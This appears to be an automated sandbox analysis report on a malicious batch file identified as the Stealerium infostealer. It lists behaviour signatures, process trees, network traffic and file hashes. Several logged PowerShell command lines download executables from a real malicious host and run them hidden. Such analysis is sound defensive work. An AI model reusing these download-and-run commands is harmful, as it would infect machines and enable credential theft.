Analysis Overview
SHA256
295303516fe6fed6586432afa4e9c0385c526786ae3c6a3be1cc8a561a2a100c
Threat Level: Known bad
The file daun.bat was found to be: Known bad.
Malicious Activity Summary
Stealerium
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Opens file in notepad (likely ransom note)
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 18:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 18:54
Reported
2024-06-14 19:00
Platform
win10v2004-20240611-en
Max time kernel
360s
Max time network
352s
Command Line
Signatures
Stealerium
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133628648800905362" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\daun.bat"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe195fab58,0x7ffe195fab68,0x7ffe195fab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2172 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3092 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4304 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4336 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4572 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4836 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4704 --field-trial-handle=1896,i,329060599827115571,8611459145132649893,131072 /prefetch:1
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\lox.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lox.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2258.tmp.bat
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 3796
C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe195fab58,0x7ffe195fab68,0x7ffe195fab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1640 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2192 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3044 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3052 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4304 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4440 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4576 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4628 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4852 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4816 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:1
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\lox.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lox.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/SolaraMain.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'; Start-Process 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe' -WindowStyle Hidden"
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp921F.tmp.bat
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 4472
C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\lox.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lox.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/SolaraMain.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'; Start-Process 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp490C.tmp.bat
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 2608
C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1876,i,547449731481158669,18411469935280892748,131072 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a0995400.xsph.ru | udp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 8.8.8.8:53 | 58.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a0995400.xsph.ru | udp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 8.8.8.8:53 | 25.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | e2c34.gcp.gvt2.com | udp |
| KR | 35.216.18.75:443 | e2c34.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| KR | 35.216.18.75:443 | e2c34.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 75.18.216.35.in-addr.arpa | udp |
Files
\??\pipe\crashpad_3824_UTGFBDHAFIKTPJJU
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d1abcfc826f27b1d5ee0c54a31722463 |
| SHA1 | 61fb581dd79f4b5199229450f44b38534ebabf22 |
| SHA256 | 79738ea2c9f39c4d084407ae574add071b95a2c5204a3e0fa0f4b9b28231e171 |
| SHA512 | bef2ab3834b776ebdac09d5e79f171bc5ad657965313ea921680d4879d2cd77610a2298f08afe9aa105227f6d8c8722ddec4581166ebe78a9325a15c3beeeb58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0db61ff1674c373954c00b63f9a2e0e6 |
| SHA1 | ce8becb6e2f05a268005163782407dfb2cb32c88 |
| SHA256 | 22ea897c6c7ccff58e6dbb09b98c357cc09de6d8bb602314752a0a41923b23fc |
| SHA512 | 3ae94ef1d39202ac7b3d0ccf22ae2f03b7e9425d718879ac08b4c2bc5748ddd4041e98bf0f34c734c0bbf73fe8788cdb3a5c7ab3d6cfc9a3aaa3920b0a012859 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | d5f1a402d9191a7ebf884153e6d6f125 |
| SHA1 | a7f1125adeacbe17c7e6ab320750a2aa0cdd2c6a |
| SHA256 | a763aa885057022fdc57580c1849b519cd6cf2abe76c68e8489483ac785a087b |
| SHA512 | ae5aeaa07cf30cfd9d0152a6ab3bcada50f5d297d298edad6da919533af07611377461dca04fb61bd9115e7fbfb6ab8a75aa1ed883749516f4ec79d24002608e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | a60eece2ad445dcbdc519361c0deb9ba |
| SHA1 | 955cd09a04b3c04a7e41c23f7986649c195f41e0 |
| SHA256 | 547f9a5aa300d14dfa250e464dd17aafd59d81d114a74f769a94f3dcc2cbd3da |
| SHA512 | 06d590ae19e02b39be9570ec2ec4a09444bb3b767a2658fd167baf18587afef079fccdf917054bb67a52579d4503aac6a9f5b237d3392007ca64f1ac4d9806ba |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 269314f1d378530ea33132c071d81c82 |
| SHA1 | fcf6f7877d65d491647954384e8e6a5b7679fe90 |
| SHA256 | 0aa17c0849dd246a3452fa6047f0800f734aedc400dbe3e52da366a00911576f |
| SHA512 | e540de836eebfb031b7be138920e2d475a3eea5d30ce296d6665a20288437da580093d5067b01dc3162ec164eafd006e4fbe12c3ebc0c80f775cb401e13f8792 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e65e558df2e720b067a291b7c766584b |
| SHA1 | 5073126d112dd5ae8233223362dd7a89cd92d260 |
| SHA256 | aea4dff749098e0000f8d74303af4f95e915d21972c87cadd105d43b046ae707 |
| SHA512 | 9e72e11d5f12320c1b27a320e89579905cf01d1c8a7c6a4a789f5e911f9e28a76440c23f5c2bd0611755cce45312f921b5d342522c634620039a730e566d8586 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | b51eb746d1be03251d4ec27b4246afde |
| SHA1 | 3eb0a947b0f3453a5c2807556349022f75e1b57d |
| SHA256 | 3698d49a9913b4c2b1d7c357440cc054eb1e25dcb058c9ec5efe68501a9a84ce |
